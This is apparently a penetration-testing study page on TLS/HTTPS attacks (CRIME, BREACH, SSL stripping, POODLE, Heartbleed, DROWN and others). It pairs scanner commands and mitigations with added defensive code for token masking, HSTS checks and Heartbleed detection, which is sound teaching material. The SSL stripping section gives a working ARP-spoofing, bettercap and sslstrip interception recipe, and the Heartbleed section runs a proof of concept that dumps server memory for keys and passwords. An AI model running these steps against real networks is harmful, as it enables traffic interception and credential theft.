TLS / HTTPS Attacks

TLS attack surface: CRIME/BREACH compression oracle, SSL stripping (arpspoof/bettercap), POODLE/BEAST CBC padding, Heartbleed memory leak, DROWN cross-protocol, Bleichenbacher RSA oracle, downgrade attacks, and testssl.sh scanning.

TLS Attack Landscape

TLS vulnerabilities generally fall into three categories:

  • Protocol downgrade — force use of an older, weaker protocol version (SSL 3.0, TLS 1.0)
  • Compression oracle — exploit TLS/HTTP compression to extract secrets byte-by-byte
  • Implementation bugs — memory leaks (Heartbleed), RSA oracle (Bleichenbacher), padding oracle (POODLE)

Detection — TLS Configuration Scanning

# testssl.sh — comprehensive TLS scanner
git clone https://github.com/drwetter/testssl.sh
cd testssl.sh && ./testssl.sh TARGET:443

# Specific checks
./testssl.sh --poodle TARGET:443
./testssl.sh --beast TARGET:443
./testssl.sh --crime TARGET:443
./testssl.sh --breach TARGET:443
./testssl.sh --heartbleed TARGET:443
./testssl.sh --drown TARGET:443

# Nmap TLS scripts
nmap --script ssl-enum-ciphers -p 443 TARGET
nmap --script ssl-poodle -p 443 TARGET
nmap --script ssl-heartbleed -p 443 TARGET
nmap --script ssl-dh-params -p 443 TARGET

# sslscan
sslscan TARGET:443

Attack 1: CRIME (Compression Ratio Info-leak Made Easy)

Requires: TLS compression enabled (DEFLATE) + attacker can inject controlled data into requests

How it works: If the attacker can control part of a TLS request that also contains a secret (session cookie), they can guess the secret character by character by observing compressed message sizes. Matching characters compress better → smaller size → correct guess.

Detection:

# Check if TLS compression is enabled (stdin from /dev/null so s_client exits after the handshake)
openssl s_client -connect TARGET:443 </dev/null 2>/dev/null | grep "Compression"
# Safe: "Compression: NONE"
# Vulnerable: "Compression: zlib compression"
# Caveat: an OpenSSL client built without zlib never offers compression and always prints NONE;
# with OpenSSL 1.1.0+ add -comp to request it, and treat testssl.sh --crime as the authoritative check

Mitigation: Disable TLS compression (TLS_COMP_NULL) — modern TLS 1.3 doesn’t support compression.


Attack 2: BREACH (Browser Reconnaissance and Exfiltration via Adaptive Compression of Hypertext)

Requires: HTTP-level compression (gzip/deflate) enabled + the secret appears in HTTP response body + attacker can inject data into requests (e.g., CSRF via a cross-site iframe)

How it works: Similar to CRIME but targets HTTP response body compression. The attacker injects guesses for a CSRF token into requests; if the token appears in the compressed response, a matching guess reduces the compressed size.

Detection:

# Check whether the authenticated page is gzip-compressed AND carries a secret in the body
# (-I sends HEAD, which returns no body; fetch the page and keep the headers separately)
curl -s --compressed -D headers.txt -b "session=SESSION_COOKIE" https://TARGET/account -o body.html
grep -i "content-encoding" headers.txt    # precondition: Content-Encoding: gzip
grep -i "csrf" body.html                  # plus a per-session (not per-request) token in the body

Mitigation options:

  • Disable HTTP compression for pages containing secrets
  • Separate secrets from attacker-controlled data (different responses)
  • Use randomised CSRF tokens that change per-request (masking)
  • Add random padding to responses (noise only: it raises the number of requests an attacker needs, it does not close the channel)
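The compression side channel behind both CRIME and BREACH, and the token masking that removes it, in a small added example (written for this page, not code from the original or from any named project). The page, token and wrong guess are constructed sample data; mask_token/unmask_token are hypothetical helper names that implement the per-response masking scheme Django and Rails adopted against BREACH.

```python
import base64
import os
import zlib
from typing import Dict, Optional

# Constructed sample: a hypothetical per-session CSRF token and a page that embeds it
# next to a reflected query parameter (the part of the response an attacker controls).
SECRET_TOKEN = "k7f2ab9c0d1e4f6a"
WRONG_GUESS = "3e9d0a1b2c4f5678"


def render_page(token_field: str, reflected: str) -> bytes:
    """Minimal HTML response: hidden CSRF field plus an echoed search string."""
    html = (
        "<html><body>"
        f'<form><input type="hidden" name="csrf" value="{token_field}"></form>'
        f"<p>You searched for: {reflected}</p>"
        "</body></html>"
    )
    return html.encode()


def compressed_size(body: bytes) -> int:
    """Size of the body after DEFLATE, i.e. what the TLS record length reveals."""
    return len(zlib.compress(body, 6))


def sizes_for_guesses(token_field: str, guesses) -> Dict[str, int]:
    """Compressed response size per guess, with the guess echoed next to 'value="'."""
    return {g: compressed_size(render_page(token_field, 'value="' + g)) for g in guesses}


def leak_with_static_token() -> bool:
    """The oracle: a correct guess repeats bytes already present in the page, so DEFLATE
    replaces them with a back-reference and the response gets smaller."""
    sizes = sizes_for_guesses(SECRET_TOKEN, [SECRET_TOKEN, WRONG_GUESS])
    return sizes[SECRET_TOKEN] < sizes[WRONG_GUESS]


def mask_token(token: str, mask: Optional[bytes] = None) -> str:
    """Mitigation: emit base64(mask || mask XOR token) with a fresh random mask on every
    response, so the secret bytes never appear verbatim and cannot be matched by DEFLATE."""
    raw = token.encode()
    if mask is None:
        mask = os.urandom(len(raw))
    if len(mask) != len(raw):
        raise ValueError("mask must be as long as the token")
    xored = bytes(a ^ b for a, b in zip(raw, mask))
    return base64.b64encode(mask + xored).decode()


def unmask_token(masked: str) -> str:
    """Server side: recover the session token before comparing it with the stored one."""
    blob = base64.b64decode(masked)
    half = len(blob) // 2
    mask, xored = blob[:half], blob[half:]
    return bytes(a ^ b for a, b in zip(mask, xored)).decode()


if __name__ == "__main__":
    print("static token leaks:", leak_with_static_token())
    masked = mask_token(SECRET_TOKEN)
    print("masked field:", masked)
    print("sizes with masking:", sizes_for_guesses(masked, [SECRET_TOKEN, WRONG_GUESS]))
```

With the static token the correct guess always compresses smaller; with masking the field changes on every response, so the echoed guess never matches it and the size difference carries no information. Masking leaves compression on, which is why frameworks prefer it to disabling gzip.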

Attack 3: SSL Stripping (HTTP Downgrade / MitM)

Requires: Attacker is on-path (same LAN, coffee shop, ARP poisoning) + target site doesn’t enforce HSTS

How it works:

  1. Attacker ARP-spoofs to intercept victim’s traffic.
  2. Victim’s HTTP request to http://example.com → intercepted.
  3. Attacker makes HTTPS connection to the real server.
  4. Attacker serves HTTP to the victim — victim sees no lock icon.
  5. Attacker reads all plaintext victim traffic.

Tools:

# ARP spoofing setup
sudo apt install dsniff
sudo sysctl -w net.ipv4.ip_forward=1    # (sudo echo 1 > file fails: the redirect runs unprivileged)
sudo arpspoof -i eth0 -t VICTIM_IP GATEWAY_IP    # poison victim → gateway
sudo arpspoof -i eth0 -t GATEWAY_IP VICTIM_IP    # poison gateway → victim

# bettercap (all-in-one)
sudo bettercap
# In bettercap REPL:
net.probe on
set arp.spoof.targets VICTIM_IP      # set parameters before switching a module on
arp.spoof on
set http.proxy.sslstrip true
http.proxy on
net.sniff on

# SSLstrip
sudo python3 sslstrip.py -l 10000 -w strip.log
# Then redirect HTTP traffic to port 10000 via iptables
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000

HSTS bypass (first-visit attack):

  • HSTS only works after the first HTTPS visit. On the first visit, a victim browsing http://example.com (no HTTPS forced) is still vulnerable.
  • Domains not in the HSTS preload list are vulnerable to first-visit stripping.

Mitigation:

  • Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
  • Submit to HSTS preload list at hstspreload.org
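An added example (not from the original page) that checks an HSTS policy against the requirements above and the hstspreload.org submission rules: max-age of at least one year, includeSubDomains and preload all present. The sample responses are constructed; hsts_header, parse_hsts and assess_hsts are hypothetical helper names.

```python
from typing import Dict, List, Optional

ONE_YEAR = 31536000  # seconds; the recommended max-age and the hstspreload.org minimum

# Constructed sample responses (headers only matter here).
GOOD_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains; preload\r\n"
    "Content-Type: text/html\r\n\r\n<html></html>"
)
WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Strict-Transport-Security: max-age=300\r\n"
    "Content-Type: text/html\r\n\r\n<html></html>"
)
NO_HSTS_RESPONSE = "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html></html>"


def hsts_header(raw_response: str) -> Optional[str]:
    """Pull the Strict-Transport-Security value out of a raw HTTP response."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    for line in head.split("\r\n")[1:]:
        name, sep, value = line.partition(":")
        if sep and name.strip().lower() == "strict-transport-security":
            return value.strip()
    return None


def parse_hsts(value: str) -> Dict[str, str]:
    """Split 'max-age=N; includeSubDomains; preload' into lowercase directives."""
    directives: Dict[str, str] = {}
    for part in value.split(";"):
        part = part.strip()
        if not part:
            continue
        name, _, val = part.partition("=")
        directives[name.strip().lower()] = val.strip().strip('"')
    return directives


def assess_hsts(value: Optional[str]) -> List[str]:
    """Findings for the policy; an empty list means it meets the preload requirements."""
    if value is None or not value.strip():
        return ["no Strict-Transport-Security header: first-visit stripping possible"]
    d = parse_hsts(value)
    findings: List[str] = []
    max_age = d.get("max-age")
    if max_age is None or not max_age.isdigit():
        findings.append("max-age missing or not numeric: browsers ignore the policy")
    elif int(max_age) == 0:
        findings.append("max-age=0 clears any stored policy")
    elif int(max_age) < ONE_YEAR:
        findings.append(f"max-age {max_age} is below the one year ({ONE_YEAR}) needed for preload")
    if "includesubdomains" not in d:
        findings.append("includeSubDomains missing: subdomains can still be stripped")
    if "preload" not in d:
        findings.append("preload directive missing: cannot be submitted to hstspreload.org")
    return findings


if __name__ == "__main__":
    for label, resp in [("good", GOOD_RESPONSE), ("weak", WEAK_RESPONSE), ("none", NO_HSTS_RESPONSE)]:
        print(label, assess_hsts(hsts_header(resp)) or "OK")
```

Browsers only honour the header when it arrives over HTTPS (RFC 6797), so run this against the HTTPS response, not the plain-HTTP redirect.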

Attack 4: POODLE (Padding Oracle On Downgraded Legacy Encryption)

Requires: SSL 3.0 still supported by server + attacker can trigger SSL 3.0 downgrade

How it works: SSL 3.0 CBC padding is not fully verified: the receiver checks only the final byte (the padding length), and the other padding bytes may hold any value. The attacker substitutes a chosen ciphertext block for the final padding block and observes whether the record is accepted; each guess succeeds with probability 1/256, so one byte is decrypted per 256 requests on average.
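To make the padding difference concrete, an added example (not from the original page) models the receiver-side padding checks of SSL 3.0 and TLS 1.0+ on constructed final plaintext blocks; sslv3_padding_ok and tls_padding_ok are hypothetical helper names.

```python
from typing import Dict

BLOCK = 16  # AES block size in bytes


def sslv3_padding_ok(plaintext: bytes) -> bool:
    """SSL 3.0 (RFC 6101): only the final byte, the padding length, is inspected.

    The padding bytes themselves are never compared against anything, so a full block
    of padding can be swapped for any other ciphertext block and is still accepted
    whenever its last byte happens to decrypt to the expected length (1 chance in 256).
    """
    if not plaintext:
        return False
    pad_len = plaintext[-1]
    return pad_len < BLOCK and pad_len + 1 <= len(plaintext)


def tls_padding_ok(plaintext: bytes) -> bool:
    """TLS 1.0+ (RFC 2246): every padding byte must equal the padding length."""
    if not plaintext:
        return False
    pad_len = plaintext[-1]
    if pad_len + 1 > len(plaintext):
        return False
    return all(b == pad_len for b in plaintext[-(pad_len + 1):])


# Constructed final plaintext blocks, i.e. what the receiver sees after CBC decryption.
FULL_PADDING_BLOCK = bytes([15]) * 16                # well formed: 15 pad bytes + length byte 15
GARBAGE_PADDING_BLOCK = bytes(range(15)) + b"\x0f"  # arbitrary bytes, length byte still 15


def compare_checks(block: bytes) -> Dict[str, bool]:
    """Run both checks on one block."""
    return {"sslv3": sslv3_padding_ok(block), "tls": tls_padding_ok(block)}


if __name__ == "__main__":
    print("well-formed padding:", compare_checks(FULL_PADDING_BLOCK))
    print("garbage padding:   ", compare_checks(GARBAGE_PADDING_BLOCK))
```

The garbage block passes the SSL 3.0 check and fails the TLS one; that single unchecked block is the oracle POODLE uses, and it is why disabling SSL 3.0 (rather than tuning ciphers) is the fix.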

Detection:

nmap --script ssl-poodle -p 443 TARGET
./testssl.sh --poodle TARGET:443

# Manual check — does server accept SSL 3.0?
openssl s_client -ssl3 -connect TARGET:443
# If handshake completes → vulnerable to POODLE
# Caveat: most current OpenSSL builds are compiled without SSL 3.0, so "unknown option -ssl3" means
# the client cannot test it, not that the server is safe; use the nmap/testssl.sh checks above instead

Mitigation: Disable SSL 3.0 entirely in server config.


Attack 5: BEAST (Browser Exploit Against SSL/TLS)

Requires: TLS 1.0 with CBC cipher + JavaScript running in victim’s browser (MitM + JavaScript injection)

How it works: TLS 1.0 uses predictable IV chaining in CBC mode. An attacker with a chosen-plaintext oracle (JavaScript in the same browser) can decrypt HTTPS cookies by guessing one byte at a time.

Detection:

# Check if TLS 1.0 is enabled with CBC ciphers
nmap --script ssl-enum-ciphers -p 443 TARGET | grep "TLSv1.0"
./testssl.sh --beast TARGET:443

Mitigation: Disable TLS 1.0; use TLS 1.2+ with AEAD ciphers (AES-GCM).


Attack 6: Heartbleed (CVE-2014-0160)

Requires: OpenSSL 1.0.1 through 1.0.1f

How it works: A malformed TLS heartbeat request whose declared payload length exceeds the payload actually sent causes OpenSSL to reply with up to 64 KB of adjacent heap memory per request — potentially containing private keys, session tokens, passwords.

Detection:

nmap --script ssl-heartbleed -p 443 TARGET
./testssl.sh --heartbleed TARGET:443

# Python scanner
python3 heartbleed.py TARGET 443

# Using sslscan
sslscan --show-certificate TARGET:443 | grep "Heartbleed"
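A network-side detection for the pattern described above, as an added example that is not part of the original page: it parses TLS records and flags any heartbeat whose declared payload length cannot fit in the record (RFC 6520 requires at least 16 bytes of padding, so a well-formed record satisfies payload_length + 3 + 16 <= record length). The sample records are constructed in-process; check_heartbeat, scan_stream and build_heartbeat are hypothetical helper names. The check only applies to heartbeats sent in the clear, i.e. before the handshake completes, which is where the classic probe sends them.

```python
import struct
from typing import List, Optional, Tuple

HEARTBEAT = 0x18        # TLS ContentType for heartbeat (RFC 6520)
HB_REQUEST, HB_RESPONSE = 1, 2
MIN_PADDING = 16        # RFC 6520: padding must be at least 16 bytes


def parse_record(data: bytes) -> Tuple[int, int, bytes]:
    """Split a TLS record into (content type, version, body); raises on truncation."""
    if len(data) < 5:
        raise ValueError("short TLS record header")
    ctype, version, length = struct.unpack("!BHH", data[:5])
    body = data[5:5 + length]
    if len(body) < length:
        raise ValueError("truncated TLS record")
    return ctype, version, body


def check_heartbeat(record: bytes) -> str:
    """Verdict for one record: 'ok', 'not-heartbeat', 'malformed: ...' or 'suspicious: ...'."""
    ctype, _version, body = parse_record(record)
    if ctype != HEARTBEAT:
        return "not-heartbeat"
    if len(body) < 3:
        return "malformed: heartbeat body shorter than its 3-byte header"
    hb_type, payload_len = struct.unpack("!BH", body[:3])
    if hb_type not in (HB_REQUEST, HB_RESPONSE):
        return f"malformed: unknown heartbeat type {hb_type}"
    if payload_len + 3 + MIN_PADDING > len(body):
        return (f"suspicious: payload_length {payload_len} does not fit in a "
                f"{len(body)}-byte body (Heartbleed pattern)")
    return "ok"


def scan_stream(stream: bytes) -> List[str]:
    """Walk consecutive TLS records in a captured byte stream and collect verdicts."""
    verdicts: List[str] = []
    offset = 0
    while offset + 5 <= len(stream):
        length = struct.unpack("!H", stream[offset + 3:offset + 5])[0]
        record = stream[offset:offset + 5 + length]
        try:
            verdicts.append(check_heartbeat(record))
        except ValueError as exc:
            verdicts.append(f"malformed: {exc}")
        offset += 5 + length
    return verdicts


def build_heartbeat(payload: bytes, claimed_len: Optional[int] = None,
                    padding: int = MIN_PADDING) -> bytes:
    """Constructed sample records for exercising the checker (nothing is sent anywhere)."""
    claimed = len(payload) if claimed_len is None else claimed_len
    body = struct.pack("!BH", HB_REQUEST, claimed) + payload + b"\x00" * padding
    return struct.pack("!BHH", HEARTBEAT, 0x0302, len(body)) + body


if __name__ == "__main__":
    benign = build_heartbeat(b"ping")
    oversized = build_heartbeat(b"ping", claimed_len=0x4000)
    for verdict in scan_stream(benign + oversized):
        print(verdict)
```

The same length comparison is what the Heartbleed IDS signatures encode; a patched OpenSSL silently discards such records, so on a patched host the only evidence of scanning is this request, never a long reply.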

Manual exploitation:

git clone https://github.com/sensepost/heartbleed-poc
python heartbleed-poc.py TARGET -p 443

# Dump leaked memory repeatedly — look for:
# - Private key fragments
# - Session tokens / cookies
# - Usernames/passwords in plaintext

Attack 7: DROWN (Decrypting RSA with Obsolete and Weakened eNcryption)

Requires: SSLv2 enabled on the server (or a server sharing the same private key as one with SSLv2)

How it works: An attacker uses an SSLv2 oracle to decrypt modern TLS sessions that use RSA key exchange. If the target server (or any server sharing the same private key) supports SSLv2, the attacker can brute-force RSA-encrypted pre-master secrets.

Detection:

./testssl.sh --drown TARGET:443
nmap --script sslv2 -p 443 TARGET

# Check if SSLv2 is enabled
openssl s_client -ssl2 -connect TARGET:443
# Caveat: SSLv2 was removed from OpenSSL 1.1.0, so on most systems the -ssl2 option no longer
# exists; an "unknown option" error says nothing about the server, rely on testssl.sh/nmap instead

Mitigation: Disable SSLv2 completely. Ensure private keys aren’t shared with vulnerable servers.


Attack 8: Bleichenbacher (RSA PKCS#1 Padding Oracle)

Requires: Server leaks whether RSA PKCS#1 v1.5 padding is valid (through timing, error message, or behaviour difference)

How it works: By sending millions of modified RSA ciphertexts and observing the server’s response (valid/invalid padding oracle), an attacker can recover the plaintext (pre-master secret) of a captured TLS session — decrypting it without the private key.

Detection:

# ROBOT test (Return Of Bleichenbacher's Oracle Threat)
git clone https://github.com/RUB-NDS/ROBOT-Detect
python robot-detect.py TARGET

./testssl.sh --robot TARGET:443

Attack 9: Downgrade Attack

Force the client and server to negotiate a weaker protocol:

# Test if server accepts TLS 1.0 / 1.1
openssl s_client -tls1 -connect TARGET:443     # TLS 1.0
openssl s_client -tls1_1 -connect TARGET:443   # TLS 1.1

# Test if server accepts weak ciphers
openssl s_client -cipher NULL -connect TARGET:443
openssl s_client -cipher EXPORT -connect TARGET:443
openssl s_client -cipher RC4 -connect TARGET:443
# Caveat: OpenSSL 1.1.0+ refuses to offer these suites at its default security level (and many
# builds omit them entirely), so "no ciphers available" is a client-side limitation, not evidence
# that the server is hardened; retry with e.g. -cipher 'RC4:@SECLEVEL=0' or confirm with testssl.sh

If any of these handshakes completes, the server still accepts the weak option, so a downgrade to it is possible.


Burp Suite workflow

  1. Proxy — configure to intercept HTTPS; check cipher suite in TLS details.
  2. Scanner — passive scan reports weak TLS configs, missing HSTS headers.
  3. For SSL stripping: use bettercap on the same network; observe Burp proxy traffic switch from HTTPS to HTTP.
  4. testssl.sh is the primary external tool — run it before any TLS-related finding.
  5. For BEAST/POODLE/CRIME: these are passive/oracle attacks — use testssl.sh to confirm presence, then reference the CVE for the exam.